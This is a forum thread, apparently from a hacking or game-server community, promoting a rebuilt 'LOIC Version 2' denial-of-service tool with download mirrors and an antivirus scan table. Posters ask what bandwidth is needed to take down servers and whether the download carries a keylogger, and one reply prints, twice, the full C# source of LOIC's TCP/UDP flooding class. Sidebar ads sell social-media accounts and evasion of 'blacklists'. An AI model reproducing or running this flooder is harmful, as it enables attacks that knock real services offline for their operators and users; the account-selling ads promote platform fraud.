Jump to content

Recommended Posts

Posted

LOIC Version 2 is ready!

I got the project, and i remake it, translated it to into Visual Basic.Net,

Also have updated the skin, and buttons, and 15% more powerful than old.

 

Those are the changes from the Version 1.

 

Preview:

 

i1fyqa.jpg

 

Credits: Me

 

Downloads:

Sourceforge.net - Mirror

Posted

from when dos/ddos tools and hacking shits allowed in forum? :D

That's true and you should post that in vip section anyway.

Virus scan ?

Posted

That's true and you should post that in vip section anyway.

Virus scan ?

 



Update




AhnLab-V3

-

20120425



AntiVir

-

20120425



Antiy-AVL

-

20120425



Avast

-

20120426



AVG

-

20120426



BitDefender

-

20120426



ByteHero

-

20120424



CAT-QuickHeal

-

20120425



ClamAV

HackTool.DDOS.LOIC-2

20120426



Commtouch

-

20120426



Comodo

-

20120426



DrWeb

-

20120426



Emsisoft

HackTool.Win32.Oylecann!IK

20120426



eSafe

-

20120425



eTrust-Vet

-

20120425



F-Prot

-

20120425



F-Secure

-

20120426



Fortinet

-

20120426



GData

-

20120426



Ikarus

HackTool.Win32.Oylecann

20120426



Jiangmin

-

20120425



K7AntiVirus

-

20120425



Kaspersky

HEUR:HackTool.MSIL.Flooder.gen

20120426



McAfee

Artemis!395EB361322D

20120426



McAfee-GW-Edition

Artemis!395EB361322D

20120425



Microsoft

-

20120426



NOD32

-

20120426



Norman

-

20120425



nProtect

-

20120425



Panda

-

20120425



PCTools

-

20120424



Rising

-

20120425



Sophos

Troj/Loic-A

20120426



SUPERAntiSpyware

-

20120402



Symantec

-

20120426



TheHacker

-

20120425



TrendMicro

-

20120425



TrendMicro-HouseCall

-

20120426



VBA32

-

20120425



VIPRE

-

20120425



ViRobot

-

20120425



VirusBuster

-

20120425

 

DDOS Tool, Hacking Tool, LOIC, go to google.com screenshoots to looking at there, LOIC V1, all ppl was downloaded it the same details have shown, it's not a clean virus, it's a ddos tool ^.^ i had builded from my vb.net, also, i am using it too, and as well, i will soon start making the new version of this tool (V3). Go search at google man. You will see ^.^ !

Posted

In my net i can have UPLOAD more than 100Mbps(Private Network), why with program i get only 15Mbps? Maby program is bad coded?

 

And, what speed i must have to take down servers;

MySpeed > ISP Speed?

 

 

  • 1 year later...
Posted

can some1 answer me i'm noob at this but when i donwloaded it , my anti-virus said it is an virus i know the ant-virus always say's that with hacking tools but i'm scarred this is a real virus with a keylogger and his going to steal my personal information. can somebody check it if it contains a keylogger or something?

 

-ps sry for my bad english

Posted (edited)

Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care.

 

You can't convert everything from Java/C#/C++ to vb.net. 

 

And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: 

using System;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace LOIC
{
        public class XXPFlooder
        {
                public bool IsFlooding;
                public int FloodCount;
                public string IP;
                public int Port;
                public int Protocol;
                public int Delay;
                public bool Resp;
                public string Data;
                private bool AllowRandom;

                public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random)
                {
                        this.IP = ip;
                        this.Port = port;
                        this.Protocol = proto;
                        this.Delay = delay;
                        this.Resp = resp;
                        this.Data = data;
                        this.AllowRandom = random;
                }
                public void Start()
                {
                        IsFlooding = true;
                        BackgroundWorker bw = new BackgroundWorker();
                        bw.DoWork += new DoWorkEventHandler(bw_DoWork);
                        bw.RunWorkerAsync();
                }
                private void bw_DoWork(object sender, DoWorkEventArgs e)
                {
                        try
                        {
                                byte[] buf;
                                IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
                                while (IsFlooding)
                                {
                                        Socket socket = null;
                                        if (Protocol == 1)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                                                socket.NoDelay = true;

                                                try { socket.Connect(RHost); }
                                                catch { continue; }

                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.Send(buf);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                        if (Protocol == 2)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.SendTo(buf, SocketFlags.None, RHost);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                }
                        }
                        catch { }
                }
        }
}
Edited by Aphelion
Posted

 

Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care.

 

You can't convert everything from Java/C#/C++ to vb.net. 

 

And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: 

using System;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace LOIC
{
        public class XXPFlooder
        {
                public bool IsFlooding;
                public int FloodCount;
                public string IP;
                public int Port;
                public int Protocol;
                public int Delay;
                public bool Resp;
                public string Data;
                private bool AllowRandom;

                public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random)
                {
                        this.IP = ip;
                        this.Port = port;
                        this.Protocol = proto;
                        this.Delay = delay;
                        this.Resp = resp;
                        this.Data = data;
                        this.AllowRandom = random;
                }
                public void Start()
                {
                        IsFlooding = true;
                        BackgroundWorker bw = new BackgroundWorker();
                        bw.DoWork += new DoWorkEventHandler(bw_DoWork);
                        bw.RunWorkerAsync();
                }
                private void bw_DoWork(object sender, DoWorkEventArgs e)
                {
                        try
                        {
                                byte[] buf;
                                IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
                                while (IsFlooding)
                                {
                                        Socket socket = null;
                                        if (Protocol == 1)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                                                socket.NoDelay = true;

                                                try { socket.Connect(RHost); }
                                                catch { continue; }

                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.Send(buf);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                        if (Protocol == 2)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.SendTo(buf, SocketFlags.None, RHost);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                }
                        }
                        catch { }
                }
        }
}

 

 

this isn't java, its C#

 

Few differences

 

 

using instead of import
bool Resp; instead of boolean Resp;
string Data; instead of String

 

So since C# is .net language I see it possible to be done.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



  • Posts

    • SocNet is looking for new suppliers!  — Reddit accounts with karma  — LinkedIn accounts with real connections  Message us or contact support — let’s discuss terms!  We’re also open to other partnership opportunities.   Our Online Store Offers: Accounts: Telegram, Facebook, Reddit, Twitter (X), Instagram, YouTube, TikTok, Discord, VK, LinkedIn, GitHub, Snapchat, Gmail, Emails (Outlook, Firstmail, Rambler, Onet, Gazeta, GMX, Yahoo, Proton, Web.de), Google Voice, Google Ads Premium Subscriptions: Telegram Premium, Twitter Premium X, YouTube Premium, Spotify Premium, Netflix Premium, Discord Nitro, ChatGPT Plus/PRO, XBOX Game Pass Additional Services: Telegram Stars, Proxies (IPv4, IPv6, ISP, Mobile), VPN (Outline, WireGuard, etc.), VDS/RDP Servers   SMM Panel Services: Use our SMM Panel to boost Facebook, Instagram, Telegram, Spotify, Soundcloud, YouTube, Reddit, Threads, Kick, Discord, LinkedIn, Likee, VK, Twitch, Kwai, Reddit, website traffic, TikTok, TrustPilot, Apple Music, Tripadvisor, Snapchat, and more. Promo code for store discount: PARTNER8 (8% off)  Get $1 trial balance for the SMM Panel:  Submit a ticket titled “Get Trial Bonus” via our website (Support)  ➡ Go to the SMM Panel (clickable) or contact us through the bot    Our Key Products:  Online Store: Click  Telegram Shop Bot: Click   SMM Panel: Click    Payments accepted: Bank cards · Crypto · Other popular methods   Returning buyers receive extra discounts and promo codes!   Support:  ➡ Telegram: https://t.me/solomon_bog   ➡ Discord: https://discord.gg/y9AStFFsrh   ➡ WhatsApp: https://wa.me/79051904467   ➡ Email: solomonbog@socnet.store    ➡ Telegram Channel: https://t.me/accsforyou_shop  You can also use these contacts to:  — Discuss bulk orders  — Form partnerships (Current partners: https://socnet.bgng.io/partners )  — Become our supplier SocNet — your digital goods & subscription store
    • Hello everyone, I could really use some of your knowledge regarding client-side editing. I'm not trying to do anything crazy, just a few small modifications here and there, like adding custom items or modifying how the glow effect appears on lower grade items. The issue is, I'm having a hard time navigating the file edits and figuring out exactly where each line needs to go. I tried using the Notepad++ method, but either it doesn't work for me, or I’m simply doing something wrong. To sum it up: when I import .txt files, the file editor doesn’t allow me to save and encrypt them. And even when I try making changes via the DAT editor, the client refuses to open afterward or it still doesn't save. If anyone has any experience or insight on this, I’d really appreciate your help. Thanks in advance!
    • We are certainly not an ambulance, but we will definitely cure you of blacklists and empty pockets. Live freely with SX! Each of you will receive a trial version of SX to familiarize yourself with the product, all you have to do is post in this thread
  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock